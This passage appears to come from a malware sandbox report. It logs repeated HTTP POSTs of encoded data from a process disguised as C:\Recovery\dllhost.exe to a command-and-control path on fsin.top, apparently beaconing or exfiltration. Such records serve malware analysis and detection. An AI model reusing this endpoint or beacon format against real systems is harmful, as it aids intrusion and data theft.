                                                  Aug 1, 2024 07:38:53.818434000 CEST | 1012 | OUT | Data Raw: 54 50 58 56 5a 5e 5d 54 5c 5e 5a 51 54 54 57 5a 57 5f 5e 56 56 55 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXVZ^]T\^ZQTTWZW_^VVUQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$6!=\053Y?*5-1Q&%2;3\"+?\15&G#.X!,
                                                  Aug 1, 2024 07:38:53.939918995 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:54.154103994 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:54.182403088 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2FQsustmV67ufwd4vFHyzRSv1TuAr2NBi5fq%2BEXjigxiBAoM%2FlSk8JrLq9NwPTt6V%2Bswj5h8NiBNrVxpFnhJKsw5kyUzYKFm6JLF%2B5kM11sshKO0Ughl0ZCWVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c0ec8d38cc5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  123 | 192.168.2.4 | 49860 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:54.309655905 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:54.663682938 CEST | 1012 | OUT | Data Raw: 51 50 5d 56 5a 58 58 51 5c 5e 5a 51 54 50 57 5b 57 51 5e 5a 56 5e 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]VZXXQ\^ZQTPW[WQ^ZV^Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^'6>+$&0(!>C&&P&Y6[208>";7%&G#.X!<
                                                  Aug 1, 2024 07:38:54.770133018 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:54.917979956 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uO5oBWMXPjRGtRZy3jA9E5kFC02AtA4IXWqE6Dc6yPb%2BGLhA4FGSs%2BWH1WbQY5TJQsX0XMpYpW2BKcJ%2B1I5%2FtFeBjsxAIMrqmxIKQPb3OatD0yFkIMK9FZzCvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c13f87f181d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  124 | 192.168.2.4 | 49861 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:55.049902916 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:55.397974014 CEST | 1012 | OUT | Data Raw: 54 5e 5d 50 5a 54 5d 57 5c 5e 5a 51 54 55 57 51 57 57 5e 5e 56 59 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^]PZT]W\^ZQTUWQWW^^VYQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_$1%" 05Y(+>'(&/1#,S,.'5^;Y%&G#.X!(
                                                  Aug 1, 2024 07:38:55.504211903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:55.667531967 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YmcAhx8AjAbfRcuODPyBGgMQEJQhwSsRu4r6G%2BsNCe%2FuuxqH1PWEVeqLpOp0on2LLi3I3yBfAWfktMo12HNslrq0vApa7KI59oQnVBs0kQ4TvmOKEqXgDSMQfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c189adf43d5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  125 | 192.168.2.4 | 49862 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:55.788383007 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:56.147670031 CEST | 1012 | OUT | Data Raw: 54 5f 58 56 5a 55 58 55 5c 5e 5a 51 54 5f 57 53 57 53 5e 5a 56 5f 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T_XVZUXU\^ZQT_WSWS^ZV_QZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[%")Z5[8'<++6)"X&8%_%3/>?"%&G#.X!
                                                  Aug 1, 2024 07:38:56.254975080 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:56.496061087 CEST | 581 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z7SEMF0nKvjv8EuvgCQQvCRaZzCaRJTP1STjq1TZDoTVfjqDQp%2FiEICpgoHbbYDGZJ0WFDuFl33tt%2Fvz%2BKyIRWC5PStdi1Ed%2BraecMUnJDUFDp1SIDPYJ3cPoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c1d486a4286-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a
                                                  Data Ascii: 40W[Y


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  126 | 192.168.2.4 | 49863 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:56.497076988 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:56.849705935 CEST | 1284 | OUT | Data Raw: 54 5e 58 5d 5a 5c 5d 53 5c 5e 5a 51 54 5e 57 50 57 53 5e 57 56 5f 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^X]Z\]S\^ZQT^WPWS^WV_Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$T%"=4'#Y(85=)1;#Q&,*1 (, ";\%5&G#.X!
                                                  Aug 1, 2024 07:38:56.945782900 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:57.185575962 CEST | 733 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:57 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uauXQLLBrfJljs6zTJDTxB%2BzLrWMbc3gS7K4XSuxhTKBj39fddRfqToJgEWKhOMU1%2B6GZuVr9T6D6VRygVmeFvXVVJABcW8sV2kQ%2Fpr4ZtyVaHlN6qQPX5pOfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c21a90d6a5f-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 21 0d 26 2b 21 0f 35 04 0a 51 3d 31 2e 08 3d 0a 38 14 2b 07 2f 14 31 3c 39 13 27 38 20 1c 21 3f 22 02 24 2f 21 08 32 0c 0c 1d 3e 37 21 51 04 11 26 5c 20 33 22 14 2b 3a 37 1f 24 28 30 06 23 25 30 1f 24 55 32 0d 36 17 20 5c 29 1c 18 04 28 0c 0a 0c 2e 02 27 5d 2b 1d 0d 01 25 36 2a 56 0d 17 21 09 2e 28 23 0c 27 31 24 1d 22 3f 34 0f 21 2b 25 5c 29 01 2a 5a 2a 1a 3e 5f 2d 1d 23 5a 28 23 39 0b 2a 3e 22 03 3f 3a 31 16 24 29 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98!&+!5Q=1.=8+/1<9'8 !?"$/!2>7!Q&\ 3"+:7$(0#%0$U26 \)(.']+%6*V!.(#'1$"?4!+%\)*Z*>_-#Z(#9*>"?:1$)"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  127 | 192.168.2.4 | 49864 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:56.621196985 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:56.974658966 CEST | 1012 | OUT | Data Raw: 54 54 5d 51 5a 55 58 5d 5c 5e 5a 51 54 54 57 53 57 5e 5e 5f 56 5f 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TT]QZUX]\^ZQTTWSW^^_V_QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y'")"4]$&3(6=-1;+V',1% (R->+"825&G#.X!,
                                                  Aug 1, 2024 07:38:57.075129986 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:57.244715929 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:57 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=twf7XrKJ9GD7%2BbJ5FFWzZoJcLiLV%2BJfUtlGfMWOJcd7eO8KwUOZs%2BnBYkcPefR%2BM3OGhvGzVfNG0GMHyiBNSv3TIgQ%2BVj9kXSgsDFpoVcbwihMWVrJukyKIZBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c226df18ce9-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  128 | 192.168.2.4 | 49865 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:57.368478060 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:57.724700928 CEST | 1012 | OUT | Data Raw: 51 54 5d 51 5a 5b 5d 56 5c 5e 5a 51 54 55 57 54 57 51 5e 5c 56 55 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QT]QZ[]V\^ZQTUWTWQ^\VUQ][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'T5!>4Z&&;\+(==&"%8%Y"[23<W,/_6++Y1&G#.X!(
                                                  Aug 1, 2024 07:38:57.817142963 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:58.064960957 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n9wierHT1E1NmOwvlFMbvkACOvpjNHbFkc8E3eG1regGoBDTFQIJ72mX%2B2618tvbCa%2B84WVMGjR%2BeYlTMgeFThsE3gyymM0dGv7GiWohdvE3y6qS8nJeVllRPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c271d5642bc-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  129 | 192.168.2.4 | 49866 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:58.205147982 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:58.552838087 CEST | 1012 | OUT | Data Raw: 54 5e 5d 50 5a 5d 5d 51 5c 5e 5a 51 54 52 57 5b 57 55 5e 58 56 54 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^]PZ]]Q\^ZQTRW[WU^XVTQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'.#= Y$S,)+)^28'1?)$3#/=;!;%&G#.X!4
                                                  Aug 1, 2024 07:38:58.652031898 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:58.882903099 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Q7Xc0DJBzs2NA4eKdEtStNDVLX2BzSyP7FlE536Khx3nftYywMR2xB6vzTzJ3jQ7MFLLE2wC3BwV%2B6GkXLbBiHW3O5RSclJyh%2FDPMZgghPmJQyP5mOp1O3qYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c2c4d1c1a07-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  130 | 192.168.2.4 | 49867 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:59.014427900 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:59.365643024 CEST | 1012 | OUT | Data Raw: 51 50 5d 50 5f 5e 5d 53 5c 5e 5a 51 54 50 57 50 57 51 5e 5f 56 5f 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]P_^]S\^ZQTPWPWQ^_V_Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X$2.6-06'\+;T)%6_'(4&<2$3S/+!+;X&%&G#.X!<
                                                  Aug 1, 2024 07:38:59.461992025 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:59.625089884 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:59 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0VNgwge7x7eGa%2BoXwHZZp3tgyyCP3ujKWI32P5tJDluGDjotX6Ryk7gM%2BrVTgmhDA2kMjIm3YmP54HXgtGuY4ySZNjCwZ9ZSe8sPoysXW7Bobbbckh%2BYQKBakA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c315ae82363-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  131 | 192.168.2.4 | 49868 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:59.758393049 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:00.115540981 CEST | 1012 | OUT | Data Raw: 51 53 58 50 5a 58 58 53 5c 5e 5a 51 54 55 57 55 57 57 5e 56 56 5e 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QSXPZXXS\^ZQTUWUWW^VV^Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_3!4&&$?8==C=&+;&,2&,8.$5']%&G#.X!(
                                                  Aug 1, 2024 07:39:00.247452021 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:00.486285925 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:00 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y0nLmofe2Ph80kFxwQBeKavIIDSyGGIepMTwCKL1N0ERW6moaucfb3oNO0yfusA07YG10lfXGS%2FUUwKAmaV3y6Csg8ahds4O1YkxXWaL6Y%2Fb%2B16R32CI5q9eUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c36388842e5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  132 | 192.168.2.4 | 49869 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:39:00.661329985 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:01.005938053 CEST | 1012 | OUT | Data Raw: 51 54 58 56 5a 54 58 50 5c 5e 5a 51 54 52 57 50 57 5e 5e 5d 56 5b 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTXVZTXP\^ZQTRWPW^^]V[Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y%""#=#';](>=5*_1;?&/)%0/;#^!8 %&G#.X!4
                                                  Aug 1, 2024 07:39:01.112590075 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:01.266968966 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
